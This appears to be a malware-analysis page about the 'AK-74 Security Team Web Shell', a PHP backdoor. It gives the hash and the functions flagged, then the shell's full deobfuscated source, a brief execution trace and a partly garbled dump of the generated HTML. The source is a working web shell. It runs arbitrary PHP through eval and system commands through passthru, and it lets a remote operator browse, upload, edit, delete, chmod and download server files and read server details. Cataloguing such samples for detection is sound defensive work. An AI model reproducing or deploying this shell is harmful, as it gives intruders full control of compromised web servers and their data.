PHP Malware Analysis
AK-74 Security Team Web Shell Beta Version.php
md5: 7b4e81ba8703e7ebeca0001ed18263b3
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, Original)
- php_uname (Deobfuscated, HTML, Original)
- phpinfo (Deobfuscated, HTML, Original)
- set_time_limit (Deobfuscated, Original)
Execution
- eval (Deobfuscated, HTML, Original)
- passthru (Deobfuscated, HTML, Original)
Files
- copy (Deobfuscated, HTML, Original)
- move_uploaded_file (Deobfuscated, HTML, Original)
Input
- _FILES (Deobfuscated, HTML, Original)
- _GET (Deobfuscated, HTML, Original)
- _POST (Deobfuscated, HTML, Original)
Title
URLs
- http://ak74-team.net (Deobfuscated, HTML, Original)
- www.ak74-team.net (Deobfuscated, Original)
Deobfuscated PHP code
<?php
/*
.:: :[AK-74 Security Team Web Shell Beta Version]: ::.
- AK-74 Security Team Web Site: www.ak74-team.net
- Released on 01 June 2006.
- Copyright AK-74 Security Team, 2006.
- Thank you for using our script.
*/
error_reporting(0);
set_time_limit(0);
session_start();
$xshell = $SERVER_['PHP_SELF'];
class shell
{
function getfiles()
{
$mas = array();
$i = 0;
if ($handle = opendir($_SESSION['currentdir'])) {
while (false !== ($file = readdir($handle))) {
if ($file != '..') {
if (!is_dir($_SESSION['currentdir'] . '/' . $file)) {
$mas[$i]['filename'] = $file;
$mas[$i]['filesize'] = filesize($_SESSION['currentdir'] . '/' . $file);
$mas[$i]['lastmod'] = date("H.i/d.m.Y", filemtime($_SESSION['currentdir'] . '/' . $file));
$i++;
}
}
}
closedir($handle);
}
return $mas;
}
function getdirs()
{
$mas = array();
if ($handle = opendir($_SESSION['currentdir'])) {
while (false !== ($dir = readdir($handle))) {
if ($dir != '.' && is_dir($_SESSION['currentdir'] . '/' . $dir)) {
$mas[] = $dir;
}
}
closedir($handle);
}
return $mas;
}
function geturl()
{
if ($_SESSION['currentdir'] . '/' == $_SERVER['DOCUMENT_ROOT']) {
return "/";
}
if (strpos($_SESSION['currentdir'], str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT'])) === false) {
return "";
}
return str_replace($_SERVER['DOCUMENT_ROOT'], '', $_SESSION['currentdir'] . '/');
}
function removefile()
{
if (file_exists($_GET['file'])) {
chmod($_GET['file'], 0777);
if (unlink($_GET['file'])) {
return "\xd4\xe0\xe9\xeb \xf3\xe4\xe0\xeb\xe5\xed!";
} else {
return "\xd4\xe0\xe9\xeb \xf3\xe4\xe0\xeb\xe5\xed!";
}
} else {
return "\xd4\xe0\xe9\xeb \xed\xe5 \xed\xe0\xe9\xe4\xe5\xed!";
}
}
function removedir()
{
chmod($_GET['dir'], 0777);
if (rmdir($_GET['dir'])) {
return "\xc4\xe8\xf0\xe5\xea\xf2\xee\xf0\xe8\xff \xf3\xe4\xe0\xeb\xe5\xed\xe0!";
} else {
return "\xc4\xe8\xf0\xe5\xea\xf2\xee\xf0\xe8\xff \xed\xe5 \xed\xe0\xe9\xe4\xe5\xeda!";
}
}
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return (float) $usec + (float) $sec;
}
function getpermission($path)
{
$perms = fileperms($path);
if (($perms & 0xc000) == 0xc000) {
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
function getpermissionarray($path)
{
$res = array();
$perms = fileperms($path);
if (($perms & 0xc000) == 0xc000) {
$res[] = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$res[] = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$res[] = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$res[] = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$res[] = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$res[] = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$res[] = 'p';
} else {
$res[] = 'u';
}
$res[] = $perms & 0x100 ? 'r' : '-';
$res[] = $perms & 0x80 ? 'w' : '-';
$res[] = $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$res[] = $perms & 0x20 ? 'r' : '-';
$res[] = $perms & 0x10 ? 'w' : '-';
$res[] = $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$res[] = $perms & 0x4 ? 'r' : '-';
$res[] = $perms & 0x2 ? 'w' : '-';
$res[] = $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $res;
}
function outputhead()
{
$res = '';
$res = "<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"></head>\r\n<body>\r\n<STYLE>\r\nA:link {\r\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\r\n}\r\nA:active {\r\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\r\n}\r\nA:visited {\r\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\r\n}\r\nA:hover {\r\n\tCOLOR: #C10000; TEXT-DECORATION: underline\r\n}\r\nTD {\r\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica\r\n}\r\nBODY {\r\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; \r\n}\r\n</STYLE>\r\n<div align=\"center\"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">\r\n <tr>\r\n <td colspan=7 align=\"center\">\r\n <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: ::.</font></b>\r\n </td>\r\n </tr>";
return "<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"></head>\r\n<body>\r\n<STYLE>\r\nA:link {\r\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\r\n}\r\nA:active {\r\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\r\n}\r\nA:visited {\r\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\r\n}\r\nA:hover {\r\n\tCOLOR: #C10000; TEXT-DECORATION: underline\r\n}\r\nTD {\r\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica\r\n}\r\nBODY {\r\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; \r\n}\r\n</STYLE>\r\n<div align=\"center\"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">\r\n <tr>\r\n <td colspan=7 align=\"center\">\r\n <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: ::.</font></b>\r\n </td>\r\n </tr>";
}
function outputmenu()
{
$res = '';
$res .= '<tr>
<td colspan=7 align="center">
<table border=0 cellspacing=0 cellpadding=0>
<tr align="center">
<td width=150>
<a href="' . $xshell . '?act=info">��� ��������</a>
</td>
<td width=150>
<a href="' . $xshell . '?act=filemanager">������� ��������</a>
</td>
<td width=80>
<a href="' . $xshell . '?act=phpinfo" target="_blank">phpinfo()</a>
</td>
<td width=110>
<a href="' . $xshell . '?act=execute">������� PHP</a>
</td>
<td width=150>
<a href="' . $xshell . '?act=exesys">������� �������</a>
</td>
</tr>
</table>
</td>
</tr>';
return $res;
}
function outputdown()
{
$res = '';
$res = "</table></div></body></html>";
return "</table></div></body></html>";
}
function outputfilemanager()
{
$res = '';
$number = 0;
$dirs = $this->getdirs();
$files = $this->getfiles();
sort($dirs);
sort($files);
$res .= '
<tr>
<td colspan=7 align="center">
<font color=#830000> ����� ���������:</font><b><font color=#830000>' . $_SESSION['currentdir'] . '</font></b>
</td>
</tr>
<tr align="center">
<td width=30>
</td>
<td width=330>
</td>
<td width=80><font color=#830000>������,</font> <b><font color=#830000>����</font></b>
</td>
<td width=120><font color=#830000>
��������� ���������
</font>
</td>
<td width=80 align="center"><font color=#830000>����� �������</font>
</td>
<td width=30>
</td>
<td width=30>
</td>
</tr>';
for ($i = 0; $i < count($dirs); $i++) {
$res .= '<tr><td><b><font color=#830000>' . ++$number . '</font></b></td><td><b><a href="' . $xshell . '?act=filemanager&dir=' . $dirs[$i] . '">' . $dirs[$i] . '</a></b></td><td> </td><td> </td><td>';
$res .= '<a href="' . $xshell . '?act=chmod&file=' . $_SESSION['currentdir'] . '/' . $dirs[$i] . '">' . $this->getpermission($_SESSION['currentdir'] . '/' . $dirs[$i]) . '</a>';
$res .= '</td><td> </td><td><a href="' . $xshell . '?act=filemanager&act3=del&dir=' . $_SESSION['currentdir'] . '/' . $dirs[$i] . '">delete</a></td></tr>';
}
for ($i = 0; $i < count($files); $i++) {
$res .= '<tr><td><b><font color=#830000>' . ++$number . '</font></b></td>';
$res .= '<td><a href="' . $xshell . '?act=down&file=' . $_SESSION['currentdir'] . '/' . $files[$i]['filename'] . '">' . $files[$i]['filename'] . '</a></td>';
$res .= '<td> ' . $files[$i]['filesize'] . '</td>';
$res .= '<td align="center">' . $files[$i]['lastmod'] . '</td>';
$res .= '<td align="center"><a href="' . $xshell . '?act=chmod&file=' . $_SESSION['currentdir'] . '/' . $files[$i]['filename'] . '">' . $this->getpermission($_SESSION['currentdir'] . '/' . $files[$i]['filename']) . '</a></td>';
$res .= '<td align="center"><a href="' . $xshell . '?act=edit&file=' . $_SESSION['currentdir'] . '/' . $files[$i]['filename'] . '">edit</a></td>';
$res .= '<td align="center"><a href="' . $xshell . '?act=filemanager&act2=del&file=' . $_SESSION['currentdir'] . '/' . $files[$i]['filename'] . '">delete</a></td></tr>';
}
$res .= '</table><br>';
$res .= '<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">';
$res .= '<tr><td align=center><form action="' . $xshell . '?act=filemanager" method="post"><input type="hidden" name="action" value="mkdir"><b><font color=#830000>������ ���������:</b></font> </td><td><input type="text" name="dircreate"><input type="submit" value="������"></form></td></tr>';
$res .= '<tr><td align=center><form action="' . $xshell . '?act=filemanager" method="post"><input type="hidden" name="action" value="createfile"><b><font color=#830000>������ ����:</b></font></td><td> <input type="text" name="filecreate"><input type="submit" value="������"></form></td></tr>';
$res .= '<tr><td align=center><form enctype="multipart/form-data" action="' . $xshell . '?act=filemanager" method="post"><input type="hidden" name="action" value="uploadfile"><b><font color=#830000>������ ����:</font></b></td><td><input type="file" name="filename" size="23"> <b><font color=#830000>� �������� ��</b></font></td><td> <input type="text" name="filename2"><input type="submit" value="�����"></form></td></tr>';
$res .= '<table border=0 width="700" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">';
$res .= '<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - ' . date("Y") . '</font></b></td></tr>';
return $res;
}
function outputinfo()
{
$res = '';
$res .= '<tr>
<td align="center" colspan=7>
<b><font color=#83000>��� �������� � �������</font></b>
</td>
</tr>
<tr>
<td colspan=7 align="left"><br>
<ol>
<b><font color=#830000>1. OS - </font></b><font color=#830000>' . php_uname() . '</font><br><br>
<b><font color=#830000>2. ����� PHP - </font></b><font color=#830000>' . phpversion() . '</font><br><br>
<b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - ' . get_current_user() . ' <b><font color=#830000>|| User ID</font></b> - ' . getmyuid() . ' <b><font color=#830000>|| Group ID</b></font> - ' . getmygid() . '</font><br><br>
<b><font color=#830000>4. Server Software - </font></b><font color=#830000>' . getenv('SERVER_SOFTWARE') . '</font><br><br>
<b><font color=#830000>5. Request Method - </font></b><font color=#830000>' . getenv('REQUEST_METHOD') . '</font><br><br>
<b><font color=#830000>6. Server IP - </font></b><font color=#830000>' . getenv('SERVER_ADDR') . '</font><br><br>
<b><font color=#830000>7. Your IP - </font></b><font color=#830000>' . getenv('REMOTE_ADDR') . '</font><br><br>
<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>' . getenv('HTTP_X_FORWARDED_FOR') . '</font><br><br>
</td>
</tr>
<table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - ' . date("Y") . '</font></b></td></tr>';
return $res;
}
function chmodform($file)
{
$perms = $this->getpermissionarray($file);
$res = '';
$res .= '<form action="' . $xshell . '?act=filemanager" method="post"><input type="hidden" name="action" value="chmod">' . '<input type="hidden" name="file" value="' . $file . '">
<tr>
<td align="center" colspan=7>
<b><font color=#83000>��������� ���� �������</font></b>
</td>
</tr>
<tr>
<td colspan=7 align="center">
<table border=1 cellspacing=0 cellpadding=0>';
$res .= '<tr align="center"><td> </td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>';
$res .= '<tr><td><input type="hidden" name="perms0" value="' . $perms[0] . '">' . $perms[0] . '</td>';
for ($i = 1; $i <= 9; $i++) {
$res .= '<td><input type="checkbox" name="perms' . $i . '"' . ($perms[$i] != '-' ? ' checked' : '') . '></td>';
}
$res .= '</tr><tr><td colspan=10 align="right"><input type="submit" value="�������"></td></tr>';
$res .= '</table></td></tr></form>';
return $res;
}
function editfileform($file)
{
$fp = fopen($file, 'r');
if (!$fp) {
return "\xd0\xe5\xe4\xe0\xea\xf2\xe8\xf0\xee\xe2\xe0\xed\xe8\xe5 \xf4\xe0\xe9\xeb\xe0";
}
$res = '';
$res .= '<form action="' . $xshell . '?act=filemanager" method="post"><input type="hidden" name="action" value="editfile">' . '<input type="hidden" name="file" value="' . $file . '"><tr>
<td align="center" colspan=7>
<b><font color=#83000>�������������� �����</font></b>
</td>
</tr>
<tr>
<td colspan=7 align="center">
<table border=1 cellspacing=0 cellpadding=0>';
$res .= '<tr><td><textarea rows=25 cols=100 name="filecontent">' . htmlspecialchars(fread($fp, filesize($file))) . '</textarea></td></tr>';
$res .= '<tr><td align="right"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value=' . $file . '> - <input type="submit" value="������������"></td></tr>';
$res .= '</table></td></tr></form>';
fclose($fp);
return $res;
}
function executeform()
{
$res = '';
$res .= '<form action="' . $xshell . '?act=execute" method="post"><input type="hidden" name="action" value="execute">
<tr>
<td align="center" colspan=7>
<b><font color=#83000>��������� PHP-����<br> ������� � ������� PHP ���� ( <? � ?> ) ����� �� �����!</font></b>
</td>
</tr>
<tr>
<td colspan=7 align="center">
<table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name="phpcode">';
$res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="�������"></td></tr></table></td></tr>
<table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - ' . date("Y") . '</font></b></td></tr>';
return $res;
}
function execute()
{
echo "<hr>";
echo "<pre>";
eval(stripslashes($_POST['phpcode']));
echo "</pre>";
echo "<hr>";
}
function exesysform()
{
$res = '';
$res .= '<form action="' . $xshell . '?act=exesys" method="post"><input type="hidden" name="action" value="exesys">
<tr>
<td align="center" colspan=7>
<b><font color=#83000>Execute system commands!</font></b>
</td>
</tr>
<tr>
<td colspan=7 align="center">
<table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name="cmmd">';
$res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="�������"></td></tr></table></td></tr>
<table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - ' . date("Y") . '</font></b></td></tr>';
return $res;
}
function exesys()
{
echo "<hr>";
echo "<pre>";
$result = passthru($_POST['cmmd']);
echo "</pre>";
echo "<hr>";
}
function editfile($file)
{
if (!empty($_POST['rename'])) {
rename($_POST['file'], $_POST['rename']);
}
$fp = fopen($_POST['rename'], 'w');
if (!$fp) {
return 0;
}
fwrite($fp, stripslashes($_POST['filecontent']));
fclose($fp);
return 1;
}
function chmodfile($file)
{
$res = 0;
switch ($_POST['perms0']) {
case 's':
$res |= 0xc000;
break;
case 'l':
$res |= 0xa000;
break;
case '-':
$res |= 0x8000;
break;
case 'b':
$res |= 0x6000;
break;
case 'd':
$res |= 0x4000;
break;
case 'c':
$res |= 0x2000;
break;
case 'p':
$res |= 0x1000;
break;
case 'u':
break;
}
if (isset($_POST['perms1'])) {
$res |= 0x100;
}
if (isset($_POST['perms2'])) {
$res |= 0x80;
}
if (isset($_POST['perms3'])) {
$res |= 0x40;
}
if (isset($_POST['perms4'])) {
$res |= 0x20;
}
if (isset($_POST['perms5'])) {
$res |= 0x10;
}
if (isset($_POST['perms6'])) {
$res |= 0x8;
}
if (isset($_POST['perms7'])) {
$res |= 0x4;
}
if (isset($_POST['perms8'])) {
$res |= 0x2;
}
if (isset($_POST['perms9'])) {
$res |= 0x1;
}
echo substr(sprintf('%o', $res), -4);
return chmod($file, intval(substr(sprintf('%o', $res), -4), 8));
}
function downloadfile($file)
{
header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($file));
header("Content-Disposition: attachment; filename={$file}");
readfile($file);
die;
}
function createdir()
{
if (!empty($_POST['dircreate'])) {
if (mkdir($_SESSION['currentdir'] . '/' . $_POST['dircreate'])) {
return "\xc4\xe8\xf0\xe5\xea\xf2\xee\xf0\xe8\xff \xf1\xee\xe7\xe4\xe0\xed\xe0!";
}
}
return "\xce\xf8\xe8\xe1\xea\xe0 \xef\xf0\xe8 \xf1\xee\xe7\xe4\xe0\xed\xe8\xe8 \xe4\xe8\xf0\xe5\xea\xf2\xee\xf0\xe8\xe8";
}
function createfile()
{
if (!empty($_POST['filecreate'])) {
if (file_exists($_SESSION['currentdir'] . '/' . $_POST['filecreate'])) {
return "\xd4\xe0\xe9\xeb \xf3\xe6\xe5 \xf1\xf3\xf9\xe5\xf1\xf2\xe2\xf3\xe5\xf2";
}
$fp = fopen($_SESSION['currentdir'] . '/' . $_POST['filecreate'], "w");
if ($fp) {
fclose($fp);
return "\xd4\xe0\xe9\xeb \xf1\xee\xe7\xe4\xe0\xed!";
}
}
return "\xce\xf8\xe8\xe1\xea\xe0 \xef\xf0\xe8 \xf1\xee\xe7\xe4\xe0\xed\xe8\xe8 \xf4\xe0\xe9\xeb\xe0";
}
function uploadfile()
{
if ($_FILES['filename']['error'] != 0) {
return "121212";
}
$_POST['filename2'] = trim($_POST['filename2']);
if (empty($_POST['filename2'])) {
$_POST['filename2'] = $_FILES['filename']['name'];
}
if (!copy($_FILES['filename']['tmp_name'], $_SESSION['currentdir'] . '/' . $_POST['filename2'])) {
if (!move_uploaded_file($_FILES['filename']['tmp_name'], $_SESSION['currentdir'] . '/' . $_POST['filename2'])) {
return "\xc7\xe0\xea\xe0\xf7\xea\xe0 \xf4\xe0\xe9\xeb\xe0 \xed\xe5 \xe2\xfb\xef\xee\xeb\xed\xe5\xed\xe0...";
}
}
return "\xc7\xe0\xea\xe0\xf7\xea\xe0 \xf4\xe0\xe9\xeb\xe0 \xef\xf0\xee\xe8\xe7\xe2\xe5\xe4\xe5\xed\xe0 \xf3\xf1\xef\xe5\xf8\xed\xee!";
}
}
$shell = new shell();
$timestart = $shell->getmicrotime();
$content = '';
if (!isset($_SESSION['currentdir'])) {
$_SESSION['currentdir'] = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']);
}
if (isset($_GET['dir'])) {
if (opendir(realpath($_SESSION['currentdir'] . '/' . $_GET['dir']))) {
$_SESSION['currentdir'] = realpath($_SESSION['currentdir'] . '/' . $_GET['dir']);
}
Header("Location: {$xshell}?act=filemanager");
}
$_SESSION['currentdir'] = str_replace('\\', '/', $_SESSION['currentdir']);
if (substr($_SESSION['currentdir'], -1, 1) == '/') {
$_SESSION['currentdir'] = substr($_SESSION['currentdir'], 0, -1);
}
switch ($_POST['action']) {
case 'chmod':
if ($shell->chmodfile($_POST['file'])) {
$content .= '����� ���� �������� ������';
}
break;
case 'editfile':
if ($shell->editfile($_POST['file'])) {
$content .= '�������������� �������� ������';
}
break;
case 'execute':
$shell->execute();
break;
case 'exesys':
$shell->exesys();
break;
case 'mkdir':
$content .= $shell->createdir();
break;
case 'createfile':
$content .= $shell->createfile();
break;
case 'uploadfile':
$content .= $shell->uploadfile();
break;
}
$content .= $shell->outputhead();
$content .= $shell->outputmenu();
switch ($_GET['act']) {
case 'edit':
$content .= $shell->editfileform($_GET['file']);
break;
case 'chmod':
$content .= $shell->chmodform($_GET['file']);
break;
case 'down':
$content .= $shell->downloadfile($_GET['file']);
break;
case 'filemanager':
if ($_GET['act2'] == 'del') {
$content .= $shell->removefile();
}
$content .= $shell->outputfilemanager();
if ($_GET['act3'] == 'del') {
$content .= $shell->removedir();
}
break;
case 'phpinfo':
phpinfo();
die;
case 'info':
$content .= $shell->outputinfo();
break;
case 'execute':
$content .= $shell->executeform();
break;
case 'exesys':
$content .= $shell->exesysform();
break;
}
$content .= $shell->outputdown();
echo $content;
echo '<center>���� ��������: ' . ($shell->getmicrotime() - $timestart) . '</center>';Execution traces
data/traces/7b4e81ba8703e7ebeca0001ed18263b3_trace-1676250997.1609.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:17:03.058678]
1 0 1 0.000137 393816
1 3 0 0.000222 413856 {main} 1 /var/www/html/uploads/AK-74 Security Team Web Shell Beta Version.php 0 0
1 3 1 0.000497 426256
0.000520 314416
TRACE END [2023-02-12 23:17:03.059088]
Generated HTML code
<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"></head>
<body>
<style>
A:link {
COLOR: #4d6d91; TEXT-DECORATION: underline
}
A:active {
COLOR: #4d6d91; TEXT-DECORATION: underline
}
A:visited {
COLOR: #4d6d91; TEXT-DECORATION: underline
}
A:hover {
COLOR: #C10000; TEXT-DECORATION: underline
}
TD {
FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica
}
BODY {
FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc;
}
</style>
<div align="center">';
return $res;
}
function outputmenu()
{
$res = '';
$res .= '';
return $res;
}
function outputdown()
{
$res = '';
$res .= '<table border="1" bgcolor="#eeeeee" cellspacing="0" cellpadding="3" style="border: #C10000 2px solid">
<tbody><tr>
<td colspan="7" align="center">
<b><font color="#830000" size="4">.:: :[ AK-74 Security Team Web-shell ]: ::.</font></b>
</td>
</tr><tr>
<td colspan="7" align="center">
<table border="0" cellspacing="0" cellpadding="0">
<tbody><tr align="center">
<td width="150">
<a href="'.$xshell.'?act=info">����� ����������</a>
</td>
<td width="150">
<a href="'.$xshell.'?act=filemanager">�������� ��������</a>
</td>
<td width="80">
<a href="'.$xshell.'?act=phpinfo" target="_blank">phpinfo()</a>
</td>
<td width="110">
<a href="'.$xshell.'?act=execute">��������� PHP</a>
</td>
<td width="150">
<a href="'.$xshell.'?act=exesys">��������� �������</a>
</td>
</tr>
</tbody></table>
</td>
</tr></tbody></table></div>';
return $res;
}
function outputfilemanager()
{
$res = '';
$number = 0;
$dirs = $this->getdirs();
$files = $this->getfiles();
sort($dirs);
sort($files);
$res .= '
<font color="#830000"> ������� ����������:</font><b><font color="#830000">'.$_SESSION['currentdir'].'</font></b>
<font color="#830000">������,</font> <b><font color="#830000">����</font></b>
<font color="#830000">
��������� ���������
</font>
<font color="#830000">����� �������</font>
';
for ($i = 0; $i < count($dirs); $i++)
{
$res .= '<b><font color="#830000">'.(++$number).'</font></b><b><a href="'.$xshell.'?act=filemanager&dir='.$dirs[$i].'">'.$dirs[$i].'</a></b> ';
$res .= '<a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$dirs[$i].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$dirs[$i])).'</a>';
$res .= ' <a href="'.$xshell.'?act=filemanager&act3=del&dir='.$_SESSION['currentdir'].'/'.$dirs[$i].'">delete</a>';
}
for ($i = 0; $i < count($files); $i++)
{
$res .= '<b><font color="#830000">'.(++$number).'</font></b>';
$res .= '<a href="'.$xshell.'?act=down&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.$files[$i]['filename'].'</a>';
$res .= ' '.$files[$i]['filesize'].'';
$res .= ''.$files[$i]['lastmod'].'';
$res .= '<a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$files[$i]['filename'])).'</a>';
$res .= '<a href="'.$xshell.'?act=edit&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">edit</a>';
$res .= '<a href="'.$xshell.'?act=filemanager&act2=del&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">delete</a>';
}
$res .= '<br>';
$res .= '';
$res .= '';
$res .= '';
$res .= '';
$res .= '<table border="0" bgcolor="#eeeeee" cellspacing="0" cellpadding="3" style="border: #C10000 2px solid"><tbody><tr><td align="center"><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="mkdir"><b><font color="#830000">������� ����������:</font></b> </form></td><td><input type="text" name="dircreate"><input type="submit" value="�������"></td></tr><tr><td align="center"><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="createfile"><b><font color="#830000">������� ����:</font></b></form></td><td> <input type="text" name="filecreate"><input type="submit" value="�������"></td></tr><tr><td align="center"><form enctype="multipart/form-data" action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="uploadfile"><b><font color="#830000">�������� ����:</font></b></form></td><td><input type="file" name="filename" size="23"> <b><font color="#830000">� ��������� ���</font></b></td><td> <input type="text" name="filename2"><input type="submit" value="�����"></td></tr></tbody></table>';
$res .= '';
return $res;
}
function outputinfo()
{
$res = '';
$res .= '<table border="0" width="700" bgcolor="#eeeeee" cellspacing="0" cellpadding="3" style="border: #C10000 1px solid"><tbody><tr><td align="center"><b><font color="#83000">Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team</a><a> <font color="#83000">2005 - '.date("Y").'</font></a></b></td></tr><tr>
<td align="center" colspan="7">
<b><font color="#83000">����� ���������� � �������</font></b>
</td>
</tr>
<tr>
<td colspan="7" align="left"><br>
<ol>
<b><font color="#830000">1. OS - </font></b><font color="#830000">'.(php_uname()).'</font><br><br>
<b><font color="#830000">2. ������ PHP - </font></b><font color="#830000">'.(phpversion()).'</font><br><br>
<b><font color="#830000">3.</font></b><font color="#830000"> <b><font color="#830000">User</font></b> - '.( get_current_user()).' <b><font color="#830000">|| User ID</font></b> - '.( getmyuid()).' <b><font color="#830000">|| Group ID</font></b> - '.( getmygid ()).'</font><br><br>
<b><font color="#830000">4. Server Software - </font></b><font color="#830000">'.(getenv('SERVER_SOFTWARE')).'</font><br><br>
<b><font color="#830000">5. Request Method - </font></b><font color="#830000">'.(getenv('REQUEST_METHOD')).'</font><br><br>
<b><font color="#830000">6. Server IP - </font></b><font color="#830000">'.(getenv('SERVER_ADDR')).'</font><br><br>
<b><font color="#830000">7. Your IP - </font></b><font color="#830000">'.(getenv('REMOTE_ADDR')).'</font><br><br>
